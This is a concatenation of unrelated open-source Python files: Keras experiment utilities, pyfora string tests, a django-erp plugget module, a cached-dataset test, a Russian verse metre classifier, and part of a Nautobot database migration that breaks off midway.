trial_filepath, arcname=trial_filename)
logger.info(
'experiment data saved to {}'.format(filepath))
def configure_hardware(RAND_SEED):
'''configure rand seed, GPU'''
from keras import backend as K
if K.backend() == 'tensorflow':
K.tf.set_random_seed(RAND_SEED)
else:
K.theano.tensor.shared_randomstreams.RandomStreams(seed=RAND_SEED)
if K.backend() != 'tensorflow':
# GPU config for tf only
return
process_num = PARALLEL_PROCESS_NUM if args.param_selection else 1
tf = K.tf
gpu_options = tf.GPUOptions(
allow_growth=True,
per_process_gpu_memory_fraction=1./float(process_num))
config = tf.ConfigProto(
gpu_options=gpu_options,
allow_soft_placement=True)
sess = tf.Session(config=config)
K.set_session(sess)
return sess
def debug_mem_usage():
import psutil
from mem_top import mem_top
pid = getpid()
logger.debug(
'MEM USAGE for PID {}, MEM_INFO: {}\n{}'.format(
pid, psutil.Process().memory_info(), mem_top()))
def del_self_attr(subject):
self_attrs = list(subject.__dict__.keys())
for attr in self_attrs:
delattr(subject, attr)
import gc
gc.collect()
# clone a keras model without file I/O
def clone_model(model, custom_objects=None):
from keras.models import model_from_config
custom_objects = custom_objects or {}
config = {
'class_name': model.__class__.__name__,
'config': model.get_config(),
}
clone = model_from_config(config, custom_objects=custom_objects)
clone.set_weights(model.get_weights())
return clone
# clone a keras optimizer without file I/O
def clone_optimizer(optimizer):
    from keras.optimizers import get, optimizer_from_config
if isinstance(optimizer, str):
return get(optimizer)
params = dict([(k, v) for k, v in optimizer.get_config().items()])
config = {
'class_name': optimizer.__class__.__name__,
'config': params,
}
clone = optimizer_from_config(config)
return clone
|
ufora/FORA/python/PurePython/StringTestCases.py
|
ufora/ufora
| 571 |
61852
|
# Copyright 2015 Ufora Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import ufora.test.PerformanceTestReporter as PerformanceTestReporter
import sys
class StringTestCases(object):
"""Test cases for pyfora strings"""
def test_string_indexing(self):
def f():
a = "abc"
return (a[0], a[1], a[2], a[-1], a[-2])
self.equivalentEvaluationTest(f)
def test_strings_with_weird_characters(self):
x = "\xb0"
def f():
return (x,"\xb0")
self.equivalentEvaluationTest(f)
def test_large_string_indexing_perf(self):
def f(ct, passCt):
x = "asdfasdf" * (ct / 8)
res = 0
for _ in xrange(passCt):
for ix in xrange(len(x)):
res = res + len(x[ix])
return res
self.evaluateWithExecutor(f, 1000000, 1)
self.evaluateWithExecutor(f, 10000, 1)
@PerformanceTestReporter.PerfTest("pyfora.string_indexing.large_string")
def test1():
self.evaluateWithExecutor(f, 1000000, 100)
@PerformanceTestReporter.PerfTest("pyfora.string_indexing.small_string")
def test2():
self.evaluateWithExecutor(f, 10000, 10000)
test1()
test2()
def test_large_string_parsing_perf(self):
def f(ct, passCt):
x = "1,2,3,4," * ct
res = 0
for _ in xrange(passCt):
ix = 0
while ix < len(x):
res = res + int(x[ix:ix+1]) + 12341234
ix = ix + 2
return res
self.evaluateWithExecutor(f, 1000000, 1)
with PerformanceTestReporter.RecordAsPerfTest("pyfora.string_to_int"):
self.evaluateWithExecutor(f, 1000000, 10)
def test_string_slicing(self):
def f(ct, passCt,chars):
x = "asdfasdf" * (ct / 8)
res = 0
for _ in xrange(passCt):
for ix in xrange(len(x)):
res = res + len(x[ix:ix+chars])
return res
self.evaluateWithExecutor(f, 1000000, 1, 2)
self.evaluateWithExecutor(f, 10000, 1, 2)
def runTest(func, name):
PerformanceTestReporter.PerfTest(name)(func)()
runTest(lambda: self.evaluateWithExecutor(f, 1000000, 10, 2), "pyfora.string_slicing_10mm.2_char_large_string.pyfora")
runTest(lambda: self.evaluateWithExecutor(f, 1000000, 10, 200), "pyfora.string_slicing_10mm.200_char_large_string.pyfora")
runTest(lambda: self.evaluateWithExecutor(f, 10000, 1000, 2), "pyfora.string_slicing_10mm.2_char_small_string.pyfora")
runTest(lambda: self.evaluateWithExecutor(f, 10000, 1000, 200), "pyfora.string_slicing_10mm.200_char_small_string.pyfora")
sys.setcheckinterval(100000)
runTest(lambda: f(1000000, 10, 2), "pyfora.string_slicing_10mm.2_char_large_string.native")
runTest(lambda: f(1000000, 10, 200), "pyfora.string_slicing_10mm.200_char_large_string.native")
runTest(lambda: f(10000, 1000, 2), "pyfora.string_slicing_10mm.2_char_small_string.native")
runTest(lambda: f(10000, 1000, 200), "pyfora.string_slicing_10mm.200_char_small_string.native")
sys.setcheckinterval(100)
def test_string_slicing_into_vector(self):
def testFunction(ct, passCt,chars):
x = "asdfasdf" * (ct / 8)
res = 0
for _ in xrange(passCt):
v = [x[ix*chars:ix*chars+chars] for ix in xrange(len(x) / chars)]
for e in v:
res = res + len(e)
return res
f = testFunction
self.evaluateWithExecutor(f, 1000000, 1, 2)
self.evaluateWithExecutor(f, 10000, 1, 2)
def runTest(func, name):
PerformanceTestReporter.PerfTest(name)(func)()
runTest(lambda: self.evaluateWithExecutor(f, 1000000, 10, 2), "pyfora.string_slicing_into_vector_10mm.2_char_large_string.pyfora")
runTest(lambda: self.evaluateWithExecutor(f, 1000000, 1000, 200), "pyfora.string_slicing_into_vector_10mm.200_char_large_string.pyfora")
runTest(lambda: self.evaluateWithExecutor(f, 10000, 1000, 2), "pyfora.string_slicing_into_vector_10mm.2_char_small_string.pyfora")
runTest(lambda: self.evaluateWithExecutor(f, 10000, 100000, 200), "pyfora.string_slicing_into_vector_10mm.200_char_small_string.pyfora")
sys.setcheckinterval(100000)
runTest(lambda: f(1000000, 10, 2), "pyfora.string_slicing_into_vector_10mm.2_char_large_string.native")
runTest(lambda: f(1000000, 1000, 200), "pyfora.string_slicing_into_vector_10mm.200_char_large_string.native")
runTest(lambda: f(10000, 1000, 2), "pyfora.string_slicing_into_vector_10mm.2_char_small_string.native")
runTest(lambda: f(10000, 100000, 200), "pyfora.string_slicing_into_vector_10mm.200_char_small_string.native")
sys.setcheckinterval(100)
def test_string_splitlines(self):
#test a wide variety of strings with combinations of different separators
stringsToTest = []
for char1 in ["","a"]:
stringsToTest.append(char1)
for sep1 in ["\n","\r","\n\r", "\r\n", "\r\r", "\n\n", "\r\n\r"]:
stringsToTest.append(char1 + sep1)
for char2 in ["","b"]:
stringsToTest.append(char1 + sep1 + char2)
for sep2 in ["\n","\r","\n\r", "\r\n", "\r\r", "\n\n", "\r\n\r"]:
stringsToTest.append(char1 + sep1 + char2 + sep2)
def f():
res = []
for shouldSplit in [True, False]:
for candidate in stringsToTest:
                    res = res + [(candidate, candidate.splitlines(shouldSplit))]
            return res
self.equivalentEvaluationTest(f)
def test_string_split(self):
#test a wide variety of strings with combinations of different separators
stringsToTest = ["", "a", "aa", "ab", "aba", "aaa", "bbb", "abab", "abc"]
sepsToTest = ["a","b"]
def f():
res = []
for s in stringsToTest:
for sep in sepsToTest:
                    res = res + [(s, sep, s.split(sep))]
            return res
self.equivalentEvaluationTest(f)
def test_string_indexing_2(self):
def f(idx):
x = "asdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdf"
return x[idx]
self.equivalentEvaluationTest(f, -1)
self.equivalentEvaluationTest(f, -2)
self.equivalentEvaluationTest(f, 0)
self.equivalentEvaluationTest(f, 1)
def test_string_comparison(self):
def f():
a = "a"
b = "b"
r1 = a < b
r2 = a > b
return (r1, r2)
self.equivalentEvaluationTest(f)
def test_string_duplication(self):
def f():
a = "asdf"
r1 = a * 20
r2 = 20 * a
return (r1, r2)
self.equivalentEvaluationTest(f)
def test_string_equality_methods(self):
def f():
a = "val1"
b = "val1"
r1 = a == b
r2 = a != b
a = "val2"
r3 = a == b
r4 = a != b
r5 = a.__eq__(b)
r6 = a.__ne__(b)
return (r1, r2, r3, r4, r5, r6)
self.equivalentEvaluationTest(f)
def test_large_strings(self):
def f():
a = "val1"
while len(a) < 1000000:
a = a + a
return a
self.equivalentEvaluationTest(f)
def test_define_constant_string(self):
x = "a string"
with self.create_executor() as executor:
define_x = executor.define(x)
fora_x = define_x.result()
self.assertIsNotNone(fora_x)
def test_compute_string(self):
def f():
return "a string"
remote = self.evaluateWithExecutor(f)
self.assertEqual(f(), remote)
self.assertTrue(isinstance(remote, str))
def test_strings_1(self):
def f():
x = "asdf"
return x
self.equivalentEvaluationTest(f)
|
djangoerp/pluggets/pluggets.py
|
xarala221/django-erp
| 345 |
61877
|
<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
"""This file is part of the django ERP project.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
__author__ = '<NAME> <<EMAIL>>'
__copyright__ = 'Copyright (c) 2013-2015, django ERP Team'
__version__ = '0.0.5'
from django.utils.translation import ugettext_noop as _
from djangoerp.menus.utils import get_bookmarks_for
from djangoerp.menus.models import Menu
from .loading import registry
from .forms import TextPluggetForm
def dummy(context):
return registry.default_func(context)
def menu(context):
"""Menu plugget.
Simply renders a menu.
"""
"""
It adds a context variables:
* name -- Slug of selected menu.
"""
pk = None
if "menu_id" in context:
# NOTE: Here, "context" is not a simple dict instance, so we can't use:
#
# >> pk = context.pop("menu_id", None)
#
pk = context.get('menu_id')
del context['menu_id']
if pk:
menu = Menu.objects.get(pk=pk)
context["name"] = menu.slug
return context
def bookmarks_menu(context):
"""Bookmarks plugget.
Shows all your bookmarks.
"""
if 'user' in context:
context['menu_id'] = get_bookmarks_for(context['user'].username).pk
return menu(context)
registry.register_simple_plugget_source(_("Text plugget"), _("Simply renders a text paragraph."), form=TextPluggetForm)
|
tests/contrib/test_cached_dataset.py
|
mmathys/bagua
| 635 |
61948
|
from bagua.torch_api.contrib.cached_dataset import CachedDataset
from torch.utils.data.dataset import Dataset
import numpy as np
import logging
import unittest
from tests import skip_if_cuda_available
logging.basicConfig(level=logging.DEBUG)
class MyDataset(Dataset):
def __init__(self, size):
self.size = size
self.dataset = [(np.random.rand(5, 2), np.random.rand(1)) for _ in range(size)]
def __getitem__(self, item):
return self.dataset[item]
def __len__(self):
return self.size
class TestCacheDataset(unittest.TestCase):
def check_dataset(self, dataset, cache_dataset):
for _ in range(10):
for _, _ in enumerate(cache_dataset):
pass
for i in range(len(dataset)):
self.assertTrue((dataset[i][0] == cache_dataset[i][0]).all())
self.assertTrue((dataset[i][1] == cache_dataset[i][1]).all())
@skip_if_cuda_available()
def test_redis(self):
dataset1 = MyDataset(102)
dataset2 = MyDataset(102)
cache_dataset1 = CachedDataset(
dataset1,
backend="redis",
dataset_name="d1",
)
cache_dataset2 = CachedDataset(
dataset2,
backend="redis",
dataset_name="d2",
)
cache_dataset1.cache_loader.store.clear()
self.check_dataset(dataset1, cache_dataset1)
self.assertEqual(cache_dataset1.cache_loader.num_keys(), len(dataset1))
self.check_dataset(dataset2, cache_dataset2)
self.assertEqual(
cache_dataset2.cache_loader.num_keys(), len(dataset1) + len(dataset2)
)
if __name__ == "__main__":
unittest.main()
|
rupo/metre/metre_classifier.py
|
dagrigorev/rupo
| 171 |
61954
|
<filename>rupo/metre/metre_classifier.py
# -*- coding: utf-8 -*-
# Author: <NAME>
# Description: Metre classifier.
from collections import OrderedDict
from typing import List, Dict, Tuple
import jsonpickle
import logging
from rupo.main.markup import Line, Markup
from rupo.util.mixins import CommonMixin
from rupo.metre.pattern_analyzer import PatternAnalyzer
from rupo.util.preprocess import get_first_vowel_position
from rupo.util.timeit import timeit
class StressCorrection(CommonMixin):
"""
Исправление ударения.
"""
def __init__(self, line_number: int, word_number: int, syllable_number: int,
word_text: str, stress: int) -> None:
"""
:param line_number: номер строки.
:param word_number: номер слова.
:param syllable_number: номер слога.
:param word_text: текст слова.
:param stress: позиция ударения (с 0).
"""
self.line_number = line_number
self.word_number = word_number
self.syllable_number = syllable_number
self.word_text = word_text
self.stress = stress
class ClassificationResult(CommonMixin):
"""
Результат классификации стихотворения по метру.
"""
def __init__(self, count_lines: int=0) -> None:
"""
:param count_lines: количество строк.
"""
self.metre = None
self.count_lines = count_lines
self.errors_count = {k: 0 for k in MetreClassifier.metres.keys()} # type: Dict[str, int]
self.corrections = {k: [] for k in MetreClassifier.metres.keys()} # type: Dict[str, List[StressCorrection]]
self.resolutions = {k: [] for k in MetreClassifier.metres.keys()} # type: Dict[str, List[StressCorrection]]
self.additions = {k: [] for k in MetreClassifier.metres.keys()} # type: Dict[str, List[StressCorrection]]
def get_metre_errors_count(self):
"""
:return: получить количество ошибок на заданном метре.
"""
return self.errors_count[self.metre]
def to_json(self):
"""
:return: сериализация в json.
"""
return jsonpickle.encode(self)
@staticmethod
def str_corrections(collection: List[StressCorrection]) -> str:
"""
:param collection: список исправлений.
:return: его строковое представление.
"""
return"\n".join([str((item.word_text, item.syllable_number)) for item in collection])
def __str__(self):
st = "Метр: " + str(self.metre) + "\n"
st += "Снятая омография: \n" + ClassificationResult.str_corrections(self.resolutions[self.metre]) + "\n"
st += "Неправильные ударения: \n" + ClassificationResult.str_corrections(self.corrections[self.metre]) + "\n"
st += "Новые ударения: \n" + ClassificationResult.str_corrections(self.additions[self.metre]) + "\n"
return st
class ErrorsTableRecord:
def __init__(self, strong_errors, weak_errors, pattern, failed=False):
self.strong_errors = strong_errors
self.weak_errors = weak_errors
self.pattern = pattern
self.failed = failed
def __str__(self):
return self.pattern + " " + str(self.strong_errors) + " " + str(self.weak_errors)
def __repr__(self):
return self.__str__()
class ErrorsTable:
def __init__(self, num_lines):
self.data = {}
self.num_lines = num_lines
self.coef = OrderedDict(
[("iambos", 0.3),
("choreios", 0.3),
("daktylos", 0.4),
("amphibrachys", 0.4),
("anapaistos", 0.4),
("dolnik3", 0.5),
("dolnik2", 0.5),
("taktovik3", 6.0),
("taktovik2", 6.0)
])
self.sum_coef = OrderedDict(
[("iambos", 0.0),
("choreios", 0.0),
("daktylos", 0.0),
("amphibrachys", 0.0),
("anapaistos", 0.0),
("dolnik3", 0.035),
("dolnik2", 0.035),
("taktovik3", 0.10),
("taktovik2", 0.10)
])
for metre_name in MetreClassifier.metres.keys():
self.data[metre_name] = [ErrorsTableRecord(0, 0, "") for _ in range(num_lines)]
def add_record(self, metre_name, line_num, strong_errors, weak_errors, pattern, failed=False):
self.data[metre_name][line_num] = ErrorsTableRecord(strong_errors, weak_errors, pattern, failed)
def get_best_metre(self):
for l in range(self.num_lines):
strong_sum = 0
weak_sum = 0
for metre_name in self.data.keys():
strong_sum += self.data[metre_name][l].strong_errors
weak_sum += self.data[metre_name][l].weak_errors
for metre_name, column in self.data.items():
if strong_sum != 0:
column[l].strong_errors = column[l].strong_errors / float(strong_sum)
if weak_sum != 0:
column[l].weak_errors = column[l].weak_errors / float(weak_sum)
sums = dict()
for metre_name in self.data.keys():
sums[metre_name] = (0, 0)
for metre_name, column in self.data.items():
strong_sum = 0
weak_sum = 0
for l in range(self.num_lines):
strong_sum += column[l].strong_errors
weak_sum += column[l].weak_errors
sums[metre_name] = (strong_sum, weak_sum)
for metre_name, pair in sums.items():
sums[metre_name] = self.sum_coef[metre_name] + (pair[0] + pair[1] / 2.0) * self.coef[metre_name] / self.num_lines
logging.debug(sums)
return min(sums, key=sums.get)
class MetreClassifier(object):
"""
Классификатор, считает отклонения от стандартных шаблонов ритма(метров).
"""
metres = OrderedDict(
[("iambos", '(us)*(uS)(U)?(U)?'),
("choreios", '(su)*(S)(U)?(U)?'),
("daktylos", '(suu)*(S)(U)?(U)?'),
("amphibrachys", '(usu)*(uS)(U)?(U)?'),
("anapaistos", '(uus)*(uuS)(U)?(U)?'),
("dolnik3", '(u)?(u)?((su)(u)?)*(S)(U)?(U)?'),
("dolnik2", '(u)?(u)?((s)(u)?)*(S)(U)?(U)?'),
("taktovik3", '(u)?(u)?((su)(u)?(u)?)*(S)(U)?(U)?'),
("taktovik2", '(u)?(u)?((s)(u)?(u)?)*(S)(U)?(U)?')
])
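    # Note on the templates (inferred from the surrounding code): a line is first
    # reduced to a string of "S" (stressed) / "U" (unstressed) syllables by
    # __get_line_pattern, then PatternAnalyzer.count_errors aligns that string
    # against each template and reports strong/weak mismatches; the metre with
    # the lowest weighted error sum wins (see ErrorsTable.get_best_metre).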
border_syllables_count = 20
@staticmethod
@timeit
def classify_metre(markup):
"""
Классифицируем стихотворный метр.
:param markup: разметка.
:return: результат классификации.
"""
result = ClassificationResult(len(markup.lines))
num_lines = len(markup.lines)
errors_table = ErrorsTable(num_lines)
for l, line in enumerate(markup.lines):
for metre_name, metre_pattern in MetreClassifier.metres.items():
line_syllables_count = sum([len(word.syllables) for word in line.words])
                # Lines longer than border_syllables_count syllables are not processed.
if line_syllables_count > MetreClassifier.border_syllables_count or line_syllables_count == 0:
continue
error_border = 7
if metre_name == "dolnik2" or metre_name == "dolnik3":
error_border = 3
if metre_name == "taktovik2" or metre_name == "taktovik3":
error_border = 2
pattern, strong_errors, weak_errors, analysis_errored = \
PatternAnalyzer.count_errors(MetreClassifier.metres[metre_name],
MetreClassifier.__get_line_pattern(line),
error_border)
if analysis_errored or len(pattern) == 0:
errors_table.add_record(metre_name, l, strong_errors, weak_errors, pattern, True)
continue
corrections = MetreClassifier.__get_line_pattern_matching_corrections(line, l, pattern)[0]
accentuation_errors = len(corrections)
strong_errors += accentuation_errors
errors_table.add_record(metre_name, l, strong_errors, weak_errors, pattern)
result.metre = errors_table.get_best_metre()
        # Remember all the corrections.
for l, line in enumerate(markup.lines):
pattern = errors_table.data[result.metre][l].pattern
failed = errors_table.data[result.metre][l].failed
if failed or len(pattern) == 0:
continue
corrections, resolutions, additions =\
MetreClassifier.__get_line_pattern_matching_corrections(line, l, pattern)
result.corrections[result.metre] += corrections
result.resolutions[result.metre] += resolutions
result.additions[result.metre] += additions
result.errors_count[result.metre] += len(corrections)
return result
@staticmethod
def __get_line_pattern(line: Line) -> str:
"""
        Build the stress pattern of a line: "S" for a stressed syllable, "U" for an unstressed one.
        :param line: the line.
        :return: the stress pattern string.
"""
pattern = ""
for w, word in enumerate(line.words):
if len(word.syllables) == 0:
pattern += "U"
else:
for syllable in word.syllables:
if syllable.stress != -1:
pattern += "S"
else:
pattern += "U"
return pattern
@staticmethod
def __get_line_pattern_matching_corrections(line: Line, line_number: int, pattern: str) \
-> Tuple[List[StressCorrection], List[StressCorrection], List[StressCorrection]]:
"""
        A stress may fall on a weak position if an unstressed syllable
        of the same word does not fall on an ictus; otherwise it is an error.
        :param line: the line.
        :param line_number: the line number.
        :param pattern: the pattern.
        :return: corrections, resolutions and additions.
"""
corrections = []
resolutions = []
additions = []
number_in_pattern = 0
for w, word in enumerate(line.words):
            # Words with no syllables are skipped; one-syllable words are handled separately below.
if len(word.syllables) == 0:
continue
if len(word.syllables) == 1:
if pattern[number_in_pattern].lower() == "s" and word.syllables[0].stress == -1:
additions.append(StressCorrection(line_number, w, 0, word.text, word.syllables[0].vowel()))
number_in_pattern += len(word.syllables)
continue
stress_count = word.count_stresses()
for syllable in word.syllables:
if stress_count == 0 and pattern[number_in_pattern].lower() == "s":
                    # No stresses at all, so add one wherever the metre requires it. There may be several.
additions.append(StressCorrection(line_number, w, syllable.number, word.text, syllable.vowel()))
elif pattern[number_in_pattern].lower() == "u" and syllable.stress != -1:
                    # There is a stress and it falls on this syllable, while the pattern has an unstressed position here.
                    # Find a syllable whose position in the pattern is stressed: that is our correction.
for other_syllable in word.syllables:
other_number_in_pattern = other_syllable.number - syllable.number + number_in_pattern
if syllable.number == other_syllable.number or pattern[other_number_in_pattern].lower() != "s":
continue
ac = StressCorrection(line_number, w, other_syllable.number, word.text, other_syllable.vowel())
if stress_count == 1 and other_syllable.stress == -1:
corrections.append(ac)
else:
resolutions.append(ac)
number_in_pattern += 1
return corrections, resolutions, additions
@staticmethod
def get_improved_markup(markup: Markup, result: ClassificationResult) -> Markup:
"""
        Improve the markup after metre classification.
        :param markup: the initial markup.
        :param result: the classification result.
        :return: the improved markup.
"""
for pos in result.corrections[result.metre] + result.resolutions[result.metre]:
syllables = markup.lines[pos.line_number].words[pos.word_number].syllables
for i, syllable in enumerate(syllables):
syllable.stress = -1
if syllable.number == pos.syllable_number:
syllable.stress = syllable.begin + get_first_vowel_position(syllable.text)
for pos in result.additions[result.metre]:
syllable = markup.lines[pos.line_number].words[pos.word_number].syllables[pos.syllable_number]
syllable.stress = syllable.begin + get_first_vowel_position(syllable.text)
return markup
@staticmethod
def improve_markup(markup: Markup) -> \
Tuple[Markup, ClassificationResult]:
"""
        Improve the markup with the metre classifier.
        :param markup: the initial markup.
"""
result = MetreClassifier.classify_metre(markup)
improved_markup = MetreClassifier.get_improved_markup(markup, result)
return improved_markup, result
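# A hypothetical usage sketch (not part of the original module). `improve_markup`
# is the typical entry point shown above; how a `Markup` object is constructed is
# assumed here and may differ in the actual library:
#
#     markup = Markup.process_text(text, stress_predictor)  # assumed constructor
#     improved_markup, result = MetreClassifier.improve_markup(markup)
#     print(result.metre)                       # best-matching metre name
#     print(result.corrections[result.metre])   # stress corrections for that metre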
|
nautobot/dcim/migrations/0003_initial_part_3.py
|
psmware-ltd/nautobot
| 384 |
61966
|
# Generated by Django 3.1.7 on 2021-04-01 06:35
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import mptt.fields
import nautobot.extras.models.statuses
import taggit.managers
class Migration(migrations.Migration):
initial = True
dependencies = [
("contenttypes", "0002_remove_content_type_name"),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("tenancy", "0001_initial"),
("extras", "0001_initial_part_1"),
("dcim", "0002_initial_part_2"),
("ipam", "0001_initial_part_1"),
]
operations = [
migrations.AddField(
model_name="rackreservation",
name="user",
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name="rackgroup",
name="parent",
field=mptt.fields.TreeForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="children",
to="dcim.rackgroup",
),
),
migrations.AddField(
model_name="rackgroup",
name="site",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="rack_groups", to="dcim.site"
),
),
migrations.AddField(
model_name="rack",
name="group",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="racks",
to="dcim.rackgroup",
),
),
migrations.AddField(
model_name="rack",
name="role",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="racks",
to="dcim.rackrole",
),
),
migrations.AddField(
model_name="rack",
name="site",
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name="racks", to="dcim.site"),
),
migrations.AddField(
model_name="rack",
name="status",
field=nautobot.extras.models.statuses.StatusField(
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="dcim_rack_related",
to="extras.status",
),
),
migrations.AddField(
model_name="rack",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="rack",
name="tenant",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="racks",
to="tenancy.tenant",
),
),
migrations.AddField(
model_name="powerporttemplate",
name="device_type",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="powerporttemplates", to="dcim.devicetype"
),
),
migrations.AddField(
model_name="powerport",
name="_cable_peer_type",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="contenttypes.contenttype",
),
),
migrations.AddField(
model_name="powerport",
name="_path",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to="dcim.cablepath"
),
),
migrations.AddField(
model_name="powerport",
name="cable",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="dcim.cable"
),
),
migrations.AddField(
model_name="powerport",
name="device",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="powerports", to="dcim.device"
),
),
migrations.AddField(
model_name="powerport",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="powerpanel",
name="rack_group",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to="dcim.rackgroup"
),
),
migrations.AddField(
model_name="powerpanel",
name="site",
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to="dcim.site"),
),
migrations.AddField(
model_name="powerpanel",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="poweroutlettemplate",
name="device_type",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="poweroutlettemplates", to="dcim.devicetype"
),
),
migrations.AddField(
model_name="poweroutlettemplate",
name="power_port",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="poweroutlet_templates",
to="dcim.powerporttemplate",
),
),
migrations.AddField(
model_name="poweroutlet",
name="_cable_peer_type",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="contenttypes.contenttype",
),
),
migrations.AddField(
model_name="poweroutlet",
name="_path",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to="dcim.cablepath"
),
),
migrations.AddField(
model_name="poweroutlet",
name="cable",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="dcim.cable"
),
),
migrations.AddField(
model_name="poweroutlet",
name="device",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="poweroutlets", to="dcim.device"
),
),
migrations.AddField(
model_name="poweroutlet",
name="power_port",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="poweroutlets",
to="dcim.powerport",
),
),
migrations.AddField(
model_name="poweroutlet",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="powerfeed",
name="_cable_peer_type",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="contenttypes.contenttype",
),
),
migrations.AddField(
model_name="powerfeed",
name="_path",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to="dcim.cablepath"
),
),
migrations.AddField(
model_name="powerfeed",
name="cable",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="dcim.cable"
),
),
migrations.AddField(
model_name="powerfeed",
name="power_panel",
field=models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT, related_name="powerfeeds", to="dcim.powerpanel"
),
),
migrations.AddField(
model_name="powerfeed",
name="rack",
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to="dcim.rack"),
),
migrations.AddField(
model_name="powerfeed",
name="status",
field=nautobot.extras.models.statuses.StatusField(
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="dcim_powerfeed_related",
to="extras.status",
),
),
migrations.AddField(
model_name="powerfeed",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="platform",
name="manufacturer",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="platforms",
to="dcim.manufacturer",
),
),
migrations.AddField(
model_name="inventoryitem",
name="device",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="inventoryitems", to="dcim.device"
),
),
migrations.AddField(
model_name="inventoryitem",
name="manufacturer",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="inventory_items",
to="dcim.manufacturer",
),
),
migrations.AddField(
model_name="inventoryitem",
name="parent",
field=mptt.fields.TreeForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="child_items",
to="dcim.inventoryitem",
),
),
migrations.AddField(
model_name="inventoryitem",
name="tags",
field=taggit.managers.TaggableManager(through="extras.TaggedItem", to="extras.Tag"),
),
migrations.AddField(
model_name="interfacetemplate",
name="device_type",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="interfacetemplates", to="dcim.devicetype"
),
),
migrations.AddField(
model_name="interface",
name="_cable_peer_type",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="contenttypes.contenttype",
),
),
migrations.AddField(
model_name="interface",
name="_path",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to="dcim.cablepath"
),
),
migrations.AddField(
model_name="interface",
name="cable",
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="+", to="dcim.cable"
),
),
migrations.AddField(
model_name="interface",
name="device",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, related_name="interfaces", to="dcim.device"
),
),
migrations.AddField(
model_name="interface",
name="lag",
